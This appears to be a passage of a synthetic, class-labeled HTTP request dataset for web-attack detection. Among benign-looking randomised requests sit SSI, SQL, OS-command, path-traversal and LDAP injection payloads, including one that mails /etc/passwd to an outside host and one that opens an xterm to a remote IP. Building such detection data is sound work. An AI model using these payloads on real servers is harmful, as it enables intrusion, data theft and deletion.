UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5304x185
Via: 3.3 130.242.71.109:3, FTP/9.9 www.w1exahr.shtml, lxpis/0.7 110.30.225.53
Transfer-Encoding: compress
Upgrade: piC/1.9, snoer/6.7, 5naem/2.3, dlstE/7.8
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 181.78.248.209
X-Serial-Number: 76735229395499245344
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31327
Start - Id: 17772
class: Valid
GET /ie/rk5rlo/beyrl/eelmubOtctp/3em.asp?emaAaeG3lnt5e=099&8a=shaiyhtsuus&_zv5y=leiRosic%25emht%5Cp&lnrehTsD=Uwe6sR24ldnro5mc HTTP/1.0
Host: 186.2.146.185
Connection: 9te21tr
Accept: */*
Accept-Charset: shift_jis;q=0.5
Accept-Encoding: deflate, compress;q=0.4, identity;q=0.4
Accept-Language: ni-od;q=0.4, oaNaper-caTte
Cache-Control: no-store
Client-ip: 128.44.100.2
Cookie: 4toobuwi=1;vyidEibMAwtg=edAnl;slcmsbXEqYp1Ha=4413542;5th=8;hpoeOu=bjbdrasosrlcl;Kdeletev2WL=864
Cookie2: $Version="3"
Date: Tue, 28 Sep 04 09:35:30 CET
ETag: "42C1OGwM6zHLpm6"
Expect: 100-continue
From: 0D8aoioi@bieedfc.uk
If-Modified-Since: Sun, 23 Mar 08 07:28:37 UTC
If-Unmodified-Since: Mon, 11 Apr 05 18:13:29 CET
If-Match: "UIVrNrY4zTaRL9eN"
If-None-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 3.7
Pragma: hlems='tortemte'
Proxy-Authorization: Digest opaque="tmvEti"
Authorization: Digest uri=/ehrontyd/ltvpvnei.cfm
Range: 329245-531,569228-311014,-5
Referer: http://www.ngss1.uk/lneo0/p3wI/eusntaia/szeir.php
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/1.0 (X11; U; Linux i386 4.5; ag-ad; rv:7.5.7) Gecko/56385472
UA-CPU: x86
UA-Disp: 2786,862,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 582x198
Via: pT5A/5.1 www.cxE9nn.htm, HTTP/2.4 144.74.165.212
Transfer-Encoding: owatu6; ymret=eawco
Upgrade: hrjjsa/6.3, slosri/3.8, i8y/4.8, vli8r/7.4
Warning: 685 www.cMeV7n.jpg "Rshilnhailrb" "Fri, 30 Apr 10 23:05:54 CET"
X-Forwarded-For: 105.19.29.209
X-Serial-Number: 197606037
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17772
Start - Id: 39896
class: SSI
GET /Ycopy2Kaccess_log.cfrom4Y3M9TV/iwoe8uiyo/9ifromSSN2binkZ/aSfjihAGC/UalunionJm81T/D8node.3Nri3_aZu5L/nySbnjliplnEtsr/aJeWjuI@JIBr6Fn.css?lsibtnine=a0UiQz-U&Rxzcx=dlocationia0q5zopttbOido%24%28u&fP.Fc6JkV=giqfne&ointAnoXNme=mwi&tq=v%7EGoimghttps04tttbodyc-2tzdt&a8snbohi=7%25k%24dropN3wsmfpcrusfm&DSE@having=la2yRra&oec=29 HTTP/1.0
Host: www.pyeX.be
Connection: hes1dvww
Accept: */*;q=0.0
Accept-Charset: koi8;q=0.9, x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 141.68.193.206
Cookie: inXZuECgRiq=ertre28F3Esw;lrejhhcetDq=%u4;fg=<!--#exec     cmd="/bin/mail 3mta.com    <  /etc/passwd"-->;_linkIO._5QLbody=zi23uB;pdo0tcteaJfd=ia2|wmu5
Date: Wed, 26 Aug 09 22:13:07 UTC
ETag: "V9dv6ZsuKtrwpY9m8Ps"
If-Unmodified-Since: Tue, 23 Jun 09 09:12:03 GMT
If-Match: "8dsslqa5e85Kpzx"
If-Range: "-RhHK9ZQogIdf1f"
Max-Forwards: 63
Pragma: no-cache
Authorization: Basic YXNvcmI6cGVoZXVhaA==
Referer: http://OdudTue.fr/hgD6ee.tar
TE: gzip,trailers
User-Agent: Mozilla/2.1 (X11; U; Solaris 4.2; go-oe; rv:4.3.3) Gecko/44363064
UA-OS: Solaris
Transfer-Encoding: compress
----: ----------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 39896
Start - Id: 20078
class: Valid
GET /a@gpnBiy4J_7J6rS/gNts/cbgsound08RDvl3QAdiv/m-CYLKd/5i5/rkrhetyt/na9hhtWMg/brwo7VEhM_bViLv/7fromn/ineos4el7hht.php?eThenaod=t&o0afiearXosufii=5320&mnustie44sb=n4iw+tibetweensinputm%7Ct%3Bp%24fs&e1vwsdtneieidIb=butelnetT%3Drs&hHUsueryiended=536&mE=nNt8e2ailh&iuZZUt=nmiEhttpse&smDhtq2allrs=l&drfnphh5e7i=xsam9iu&tOuUasje=+s1snee8bne&ezjorct=s+e%3DINhFlhTO HTTP/1.0
Host: 201.149.145.134
Connection: keep-alive
Accept: image/*;q=0.8, application/rtf, image/jpeg
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, gzip;q=0.8
Accept-Language: oyn-e;q=0.4, UsaN-mQsPncwa;q=0.9, iSgsi-sHrcd35, toe-dtR, aIb-ee9eee5;q=0.8
Cache-Control: max-stale
Client-ip: 22.232.60.172
Cookie: eh5SeI6soo=Nco ;uwGG.kOch=oaE4fiuso;1se=hlstdin;t3lln2mihr=tnn0li);M2g3ovbscript5WR=834609
Cookie2: $Version="874"
Date: Tue, 11 Apr 06 14:06:07 UTC
ETag: W/"4kazoOlWgyGlDFi59"
Expect: 100-continue
From: lnAp2pl@vGteni.biz
If-Modified-Since: Tue, 02 Mar 04 05:53:16 CET
If-Unmodified-Since: Sun, 20 Dec 09 13:14:08 CET
If-Match: "gPB2DGf-5-u_UrlYJE0"
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 0.9
Pragma: E='laLvoaet'
Proxy-Authorization: Digest nonce
Authorization: Basic eWZ0dDphZ3VkZ29F
Range: -09642
Referer: http://scnehg.com/neguota.htm
TE: chunked;q=0.4,gzip;q=0.0,trailers
Trailer: If-Match
User-Agent: aiteueheot (ry-XJotv6; erYuAMPcf; ihRdGAuExB; pcJpVBPr; u_ICpG)
UA-CPU: MIPS
UA-Disp: 894,918,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1108x908
Via: 5.3 www.uehh8m.css
Transfer-Encoding: a3is
Upgrade: edl/6.4, oivt/9.3, uhe/8.8, vst/2.0
Warning: 538 147.53.166.140 "xttnfadtizmh0a" "Tue, 02 Aug 05 13:31:53 GMT"
X-Forwarded-For: 51.235.225.48
X-Serial-Number: 9909201039312
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 20078
Start - Id: 1332
class: Valid
GET /Br0aBaf/fnR/3v996bMhll3W/oelNseeijc/phyKs/3OtYT3.nQ@mBhW2.jpeg?ncuricswtu=pTiiwtsPnunionnnvaits4nci&rce2o6ejzbX=re+wl2Rote&e6seKthcDuv=tac-%40iM%40v%40&PuZQlwX_=suI&I1AZOlTcvVM=pVcZKCPaA&u2hI-KTpF=oQW.Q&XvMGaja=vao%2B HTTP/1.0
Host: www.euesdgnCet.fr
Connection: close
Accept: video/*;q=0.8, image/*
Accept-Charset: euc-jp;q=0.6, windows-1252, euc-tw, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 201.168.163.248
Cookie: use=etahtw;ok0thw8di8p=8067159
Cookie2: $Version="33"
Date: Mon, 24 Oct 05 19:06:47 UTC
ETag: "0QgRBZJ6VyrCQs98q7"
Expect: 100-continue
From: 8entgon@nrJoy6t.fr
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Tue, 16 Sep 08 17:34:49 CET
If-Match: "CP.9E_TLqCF4p_P"
If-None-Match: *
If-Range: Mon, 09 Jan 06 18:55:00 CET
Max-Forwards: 80
MIME-Version: 4.4
Pragma: sh=Rjokoot
Proxy-Authorization: e9vjnk aure=ntiF
Authorization: NTLM bm9jZ29saW5zYTZrb2RhYnByYWhTZ2VhM0hiYU5yYU5mZU9ldTdu
Range: -216
Referer: /Eresd/yahmt/rcux.cgi
TE: trailers,trailers
Trailer: Via
User-Agent: iecsbhj (5yP8h0; m.14S6; rZiDV2BLC)
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 290x591
Via: 6.1 www.ae65f.tiff, FTP/9.2 227.85.85.104
Transfer-Encoding: gzip
Upgrade: oasUc1/8.1, Dt6u/0.5, ako/9.5, Qsi/1.9, 4ni/6.3
Warning: 373 www.2zTns2mm.tiff "ero9leMeia" 
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 28172418351681
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1332
Start - Id: 23936
class: Valid
GET /wzShyP/nhct/u4leJ9N-LPrk3bqpb/eEi/db8deidmns/eDh/esidua/2jN7unJoKyl.gif? HTTP/1.1
Host: 37.222.233.126
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.3, gzip, compress
Accept-Language: iohsis-e8i, Te35-xlEnok, t-tev4iip, ihsaoao6-Gwzvum1a
Cache-Control: max-age=9243
Client-ip: 238.183.7.187
Cookie: FS@5SVxyN@4@=tL_IP98k;ctpnbte=AnsA;oDxmn=31328;tnertA5nireerE=684;tthGgdbi=00483907
Cookie2: $Version="9"
Date: Sat, 04 Feb 06 09:24:23 CET
ETag: W/"JhRUUOk2j3NFjJPyNbQn"
Expect: 100-continue
From: omamOa@dclHyn.st
If-Modified-Since: Wed, 09 Jul 08 02:31:14 GMT
If-Unmodified-Since: Wed, 25 Apr 07 23:41:29 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 14 May 05 18:59:30 GMT
Max-Forwards: 6889
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: ers8 j6eroeoe=halr4
Authorization: NTLM ZDVudHNIZXNjSW5vbG1jbDJuN3RxdG5obXBoc3RsY3lwbERobHNzb2huYWlic3dT
Range: 074-7647,9-,-3
Referer: http://ei8Xsfd.com/pebiw/ehqtnf/ar3sa/e1egdte.sh
TE: deflate
Trailer: Accept-Encoding
User-Agent: ooqiofo (n5nhx4Whm; eD_dflmf; zWMtIpE7)
UA-CPU: StrongARM
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 916x209
Via: FTP/4.2 www.eGhA.tiff, FTP/9.2 www.elnnra.tiff, FTP/6.4 176.114.217.1
Transfer-Encoding: gzip
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 220.20.217.236
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23936
Start - Id: 42144
class: SqlInjection
GET /aabnGlastCrnCarbI0/2gN0dWHaFCxistdinwCX/GT7ZHkllogXENi7/2kkLUSxYyteA4c5Fto/efeateo3h/IWpositionlocation@aYi3npZ/nlalt/ekmejitsivtrh/xzRNa@n0JevalnZB/sfBKs.htm?eosetGo7esfh7ii=9266&hT6riesbwnyr0t=607593&wfOlQkK4wz=3066376252&e9tt=%27++%29%3B+++++delete+++from+++users%3B++++commit%3B+dummy%28++++%27&rsystemQTfb@CJwp-T=dastdinfin%5CsyeaO%3Eeht7ce%7E&ia9hetHsbS=e+&2Q_7=1532428&ieblot5anzlnoe=5 HTTP/1.1
Host: www.eihnesa.cz:80
Connection: close
Accept: text/xml;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: max-age=17810
Client-ip: 117.221.83.105
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="671"
Date: Fri, 02 Dec 05 24:30:49 GMT
ETag: "Y-kpqEtfEwcQg2fs"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Thu, 16 Jun 05 06:24:24 UTC
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: *
If-None-Match: "sgypeQJz@ly.7xrhl3qE"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /6rhrsb.sh
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/6.6 (Windows; U; WinNT 5.2; Id-is; rv:8.7.9) Gecko/50277551
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: liaic/1.7 www.4txstvyo.gif
Transfer-Encoding: compress
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42144
Start - Id: 39962
class: SSI
GET /ha/aAYuyvqC38xBs.htm?M0e=%3C%21+%23%3C%21--+%23exec+++++cmd%3D%22id%22--%3E HTTP/1.1
Host: www.slum7de.gov:646
Connection: keep-alive
Accept: text/*;q=0.3, image/jpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, identity, identity;q=0.0
Accept-Language: st-mniMhrhr
Cache-Control: only-if-cached
Client-ip: 183.52.12.49
Cookie: Suwfpltaar0=8;ylgdytnsuoeant=93438;3R3Z-4pob=120438001;LihockBdrnf=1883;E1qcopy6.=57;mophao=1XZEJy
Cookie2: $Version="14"
Date: Fri, 17 Mar 06 19:49:49 CET
ETag: "RXbmOKx-dMkyhlw5m4A"
Expect: 100-continue
From: so7e5@hesdawuna.uk
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Tue, 19 Aug 08 23:40:33 UTC
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 37
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: http://1nin7.ch/eHttrst/taadhlb/esbn.swf
TE: gzip,trailers,chunked
Trailer: Connection
User-Agent: Waotelbor/2.4.0.5
UA-CPU: Sparc
UA-Color: color16
Via: 7.0 226.232.160.153, FTP/7.8 68.234.143.202
Transfer-Encoding: identity
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39962
Start - Id: 43237
class: OsCommanding
GET /ecndvuiTeD5ntil.css?dtiai=em5wybiNyudizn5d&orlehpuat=mX.l_8&nodl=9r2m9&E8teehSenrsbta=680&yruatTeinteuWVi=tA8C&hld=zAkep&tposuo=oafoDur&morSet5E=6&atbfo=%3As8e&7rf2replacelibNN9G=40074437&oDlithrsyiue=%7C+++%2Fusr%2Fopenwin%2Fbin%2Fxterm%2B-display%2B221.219.220.224%3A0%2500 HTTP/1.0
Host: www.qbnvrpdpat.org:80
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.9, windows-1258
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 36.211.14.62
Cookie: netefh=tedsele;AEPQZ3a7b4SH=ogDfaAWX@;cmN9nlannohrr=e>;uih1nte=sa 3f06nm >ro pL\apositioninsert;j3o=417608;ooqax2r15llife=rd3ledpm\tn
Cookie2: $Version="726"
Date: Mon, 14 Feb 05 02:18:42 UTC
ETag: "7vRs2CO.Rsi0wa-sA5q"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Tue, 11 Mar 08 13:21:23 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 22
MIME-Version: 7.1
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: xta4e coetilod=pcyr2o
Range: -330,06836-
Referer: /asmn/nosemen.mp3
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.8 (compatible; MSIE 7.1; Linux i586; 7wpyohe)
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 0.1 225.142.131.138
Transfer-Encoding: deflate
Upgrade: nbUlro/5.5, yfi/5.9, islxmt/9.6, tmL/9.7
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43237
Start - Id: 46098
class: PathTransversal
POST /7mytwwryeEppE2/EtQX3JNbody4jTwwi.tiff? HTTP/1.1
Content-Length: 153
Content-Language: msoaks,tyEund,n
Content-Encoding: identity
Content-Location: /acoRnha.exe
Content-MD5: aXJjbWlzbXQwb041bmVCMg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Jan 07 12:55:46 CET
Last-Modified: Wed, 19 Mar 08 13:26:42 UTC
Host: 185.211.51.48
Connection: dcmios
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 245.20.88.13
Cookie: ef=44;raoorsjuiesyEin=tUdol Eooorm;oobrroe82oeeth8=ysb|;Stmp4_grDYFV=aetRc8feshi;w.nL=t
Cookie2: $Version="0"
Date: Thu, 12 Aug 04 20:25:24 CET
ETag: W/"TbF8453pah_RFw4TC"
Expect: 1riwi
If-Modified-Since: Thu, 25 May 06 13:19:06 CET
If-Unmodified-Since: Fri, 23 Oct 09 10:00:17 CET
If-Match: "S2LD5KUML2M384N@i"
If-None-Match: *
If-Range: Mon, 28 Mar 05 13:21:03 UTC
Max-Forwards: 495
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Range: 43-
Referer: /u2ccois/yunQtf/sitncm.bin
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/3.8 (Windows; U; WinNT 5.0; m1-Nb; rv:5.4.7) Gecko/80715157
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Warning: 725 2.115.234.163 "nhM0estysig8nhena" "Sat, 25 Mar 06 01:22:22 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Etehfes1=wic6l&jgtre9eme=6 ie&Walvaru=62082921&esa=7erpuAeJnoontnyc&iroeast=frR&zLreplace9yrOKlogYW8=../../../../var/log/access_log%00.html

End - Id: 46098
Start - Id: 1558
class: Valid
GET /sAWc@vWKLFMgQxgW/xXUvD/m92HGKWWFjYjpzBJy53/ty4stvh.shtml? HTTP/1.1
Host: www.xhtlnhA0.de
Connection: nNhpix
Accept: text/*;q=0.1
Accept-Charset: utf-8;q=0.7
Accept-Encoding: 
Accept-Language: goaue-hte7ymE
Cache-Control: no-store
Client-ip: 139.146.235.78
Cookie: tyseb=1336
Cookie2: $Version="4"
Date: Thu, 25 Feb 10 21:03:31 UTC
ETag: "vFdKUf@MPEr6N6U"
Expect: meYira=tis4mexm;eieUm
From: 3utdaot@tekio.net
If-Modified-Since: Tue, 13 Dec 05 16:43:46 GMT
If-Unmodified-Since: Sat, 29 Mar 08 11:57:04 UTC
If-Match: "QpTVAgsDG7jfmSvI6UT"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: yoT7 bseO=fana
Range: -7,52718-,3057-736702
Referer: /lfeam/8os0e/nhl3t/r6taUdge/t7arazO.jpeg
TE: trailers
Trailer: Host
User-Agent: Mozilla/9.8 (Windows; U; WinNT 1.2; bl-mo; rv:1.1.1) Gecko/03234109
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7934x8697
Via: 2.8 202.66.193.122
Transfer-Encoding: waipxN; ntiEs1b=o3hovtn
Upgrade: ameA/9.9, rzoIer/1.8, llO2/3.9, Oyt/1.5
Warning: 856 30.67.224.109:7 "ngikdsay3mi" "Sat, 09 Jun 07 23:13:19 GMT"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1558
Start - Id: 34599
class: Valid
PUT /e7G75mgFtoSRsyxkpu/ruths/m6N2F/fQU.e1.nsf? HTTP/1.0
Content-Length: 126
Content-Language: znei,n,R6ia
Content-Encoding: deflate
Content-Location: /rofhEcb/6sqL/tsykeeim/rhs3htda/r36aeoe.cgi
Content-MD5: U2VvZG5mZW5sbjRhNDE3Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Sep 06 15:08:40 GMT
Last-Modified: Fri, 12 May 06 12:25:06 GMT
Host: www.dnAowmco.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=99231
Client-ip: 60.53.181.132
Cookie: tiaidppnai=00630
Cookie2: $Version="658"
Date: Wed, 12 Nov 08 16:23:28 CET
ETag: W/"vPwpXccS6LBbiMltIVZB"
Expect: esccraO6=rlwoOyee;kiigloo=603t
From: 9rrsW@dinSeD2.ch
If-Modified-Since: Mon, 23 Jun 08 11:14:39 GMT
If-Unmodified-Since: Tue, 22 Aug 06 07:09:53 CET
If-Match: "fM8Q_EPX@jKAPOQ5QMd"
If-None-Match: "Ix6a0Xdrfl82Q-C@O"
If-Range: "9I_Yo_wY_uQ1ta_SE"
Max-Forwards: 59
MIME-Version: 1.5
Pragma: uoniws=ED
Proxy-Authorization: amH2c rnecro=ka4eNao
Authorization: NTLM Z25yYWhvMHJoRWZlVG9vZWFzZ0k4b2lBc2h0Ykxubmlu
Range: 1867-,-2727
Referer: /neeom/ohotin/qse93/oadqaHt/bodjspsm.mdb
TE: trailers,gzip;q=0.9,trailers
Trailer: Accept
User-Agent: ol-xrGt http://www.Lonoael.de
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6005x647
Via: 9.5 www.oe37onN.gif, FTP/3.2 122.37.153.39
Transfer-Encoding: oimle; gi5n=fakKu
Upgrade: etesoc/8.5, ran/3.2, ebnani/4.3, mea/0.1
Warning: 945 www.eeodke.htm "hasrmstcsdtwtkpyg" "Tue, 18 Dec 07 06:07:29 UTC"
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 1977553705
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

tyILX87m=t&lr4eeeaet=OEnsbtiWiEcshEyDa&vlix82stlo3EFtc=sm&jefKind=r)ru i&yoocsy=tetcopymr1mu&t8=object9 et;=i=ladc wej

End - Id: 34599
Start - Id: 2330
class: Valid
GET /aewomdme/e3ahroofaett.dll? HTTP/1.0
Host: www.eaprnscsci.fr
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-874, iso-8859-6;q=0.9, iso-2022-kr, hz-gb-2312;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: shlIb-nsgy6Iob;q=0.4
Cache-Control: no-cache
Client-ip: 23.190.221.43
Cookie: Tr5ton=yasl
Cookie2: $Version="0"
Date: Fri, 19 Mar 10 24:32:11 UTC
ETag: W/"12r_mDVpIiXqbKs@hcS9"
Expect: l13or9e
From: s4et@ks7hmvs0.net
If-Modified-Since: Thu, 30 Jul 09 23:26:02 CET
If-Unmodified-Since: Wed, 21 Oct 09 17:30:28 GMT
If-Match: *
If-None-Match: "3K_pNB_mJT@K2qSzU"
If-Range: "jd02EX3h9EwWk589WwLL"
Max-Forwards: 1
MIME-Version: 5.5
Pragma: eEr='30uyQg'
Proxy-Authorization: NTLM MmRvcnNyZnBlZWhtaG9yZWwyYWRkYmV3ZG5lZWEybjZyMzNreWJv
Authorization: Basic Z29pcjplbHJob2Ft
Range: 744728-20044,-10
Referer: http://gnDn.uk/mlwT.shtml
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 6.0; co-d7; rv:8.4.7) Gecko/12951143
UA-CPU: Sparc
UA-Disp: 581,250,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 130x258
Via: 1.2 217.109.147.134
Transfer-Encoding: compress
Upgrade: gnSI1/5.9, Aono7/5.8
Warning: 577 www.dr7dc0.jpeg "thtn1momzurbsO" "Wed, 09 Jun 04 22:21:46 GMT"
X-Forwarded-For: 120.175.57.26
X-Serial-Number: 7123081582615631
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2330
Start - Id: 37108
class: LdapInjection
GET /uiRHk2XF_RvR1DJh/rh/7oxnea4xinc2/hgWiestadviaHh/iyIzJ-K/cXvecQ_Adb/cNCtT1MX5c3Uv/lIA.Y68ugufZ1_nH/rrenariaaaon/rcawbllimhowparDa7/jgaheoegt1moo9amd/hhbawien7aersy1qa.msf?sinOiwrEq=wWX&sfjFyuavlon=e%40&yma=kes&tlrfritrfdu=sFpY1be&ia=+ssir&2idgttubdTovotl=feth&OWLucimochaGC=neDonieoeTfkasCaa&ia0c9snTbea=8824&9bUZSXX=winnttr%5D7&eeBrohdnNeoewan=cthdl%29%28%26%28objectClass%3D++2e*%29&lAoOeghphebfdn=%5Dpba HTTP/1.1
Host: www.deeSA.fr
Connection: close
Accept: image/png, image/*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.3, deflate;q=0.8, compress, compress, deflate;q=0.6
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 82.149.38.78
Cookie: XJMq.wr=2iHhciltrltt;movlebetweenm=568;kiglhtrti1elch=yenef8siHaex6eikho;sisaizoeerrT='uekmsog Ae 0Em;nGaois0mho4nn1=24465;aimtitAhlteRS=046
Cookie2: $Version="8"
Date: Wed, 25 Apr 07 24:52:23 UTC
ETag: W/"xd@6ixSS3TZ3a9Iy"
Expect: gtPqvlrf=Lwdh
From: moaqfoa@te8R.fr
If-Modified-Since: Mon, 26 Jun 06 16:05:08 CET
If-Unmodified-Since: Mon, 07 Nov 05 09:42:11 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Dec 04 24:56:45 UTC
Max-Forwards: 43
MIME-Version: 7.7
Pragma: zsh=eco
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest response="22AF7033a49C83DF9fE5d8bDEc06BEe0"
Range: -9071,2584-
Referer: http://Eyfmh.it/mnnt/re2t/lrpxneda/qemin4df/wistmx.txt
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: 80it (oe9ayh; 95wuR.xKN; nOuk-F; qIA8bRJl; exRfvV)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: FTP/5.1 www.6hEa.tiff, 0.8 www.xorScn.jpg
Transfer-Encoding: ssaiun; saaanr=elEnru
Upgrade: oehg/2.3, ilinE/9.0
Warning: 199 www.elcE7aks.shtml "cetxttaetiha" "Mon, 13 Oct 08 07:41:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37108
Start - Id: 36494
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.zndt.st:4
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: nudn-iyasN;q=0.5, mhe-omt, e-dhF;q=0.7, tlflt-Qidi1n;q=0.3
Cache-Control: max-stale=7347
Client-ip: 219.137.139.146
Cookie: gei=diXE0Mhf0;ns3jot=sNMAay;es7j9arb6=147334;ttEzot=acdihn0im;eNncth=156
Cookie2: $Version="050"
Date: Mon, 11 Apr 05 10:51:03 UTC
ETag: W/"vjbM4Bxb6G26xH._"
Expect: araac
From: oliee@2ucHyiTL.org
If-Modified-Since: Sun, 09 Aug 09 09:21:51 CET
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "nipET-p_YUX3gXUB4"
If-None-Match: *
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 904
MIME-Version: 6.2
Pragma: no-cache
